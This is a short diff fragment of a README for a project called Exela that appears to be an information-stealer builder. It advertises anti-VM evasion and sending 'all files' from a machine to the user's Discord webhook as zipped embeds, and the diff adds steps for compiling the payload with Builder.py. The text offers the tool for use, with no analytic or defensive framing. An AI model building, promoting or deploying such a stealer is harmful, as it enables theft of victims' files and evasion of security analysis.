quicaxd/Exela/README.md

 - Anti-VM

 - Sends all files to your discord webhook in beautiful embeds and a structured zip file

+# Usage

+- Download the latest version of python from https://www.python.org/

+- Open the Exela folder on cmd and write python Builder.py and wait for the compiling

 # Warning